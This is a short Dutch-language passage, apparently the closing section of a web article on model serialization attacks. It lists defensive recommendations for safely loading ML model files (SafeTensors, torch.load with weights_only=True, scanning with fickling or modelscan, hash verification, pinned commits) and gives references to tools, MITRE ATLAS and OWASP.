Verdedigingsaanbevelingen

Gebruik SafeTensors als standaard serialisatieformaat voor alle nieuwe modellen
Gebruik altijd weights_only=True bij het laden van PyTorch-modellen met torch.load()
Scan alle modelbestanden in CI/CD-pipelines vóór deployment met fickling of modelscan
Laad nooit pickle-bestanden uit niet-vertrouwde bronnen — behandel ze als executables
Converteer bestaande pickle-modellen naar SafeTensors-formaat en stoot de pickle-versies af
Verifieer hashes van modelbestanden tegen een vertrouwd manifest vóór het laden
Beperk modeldownloadbronnen tot goedgekeurde registries met geverifieerde publishers
Monitor Hugging Face-modellen op wijzigingen na het uploaden (gebruik commit-hashes, geen branch-refs)

References

Trail of Bits fickling — https://github.com/trailofbits/fickling — static analysis for pickle files
Protect AI modelscan — https://github.com/protectai/modelscan — multi-format model file scanner
Hugging Face SafeTensors — https://github.com/huggingface/safetensors
MITRE ATLAS — AML.T0010 (ML Supply Chain Compromise)
OWASP LLM Top 10 2025 — LLM04 (Data and Model Poisoning)
Python pickle documentation — https://docs.python.org/3/library/pickle.html — see the security warnings
PyTorch weights_only documentation — https://pytorch.org/docs/stable/generated/torch.load.html

Model Serialization Attacks

Gerelateerde artikelen

Model Serialization Attacks

Gerelateerde artikelen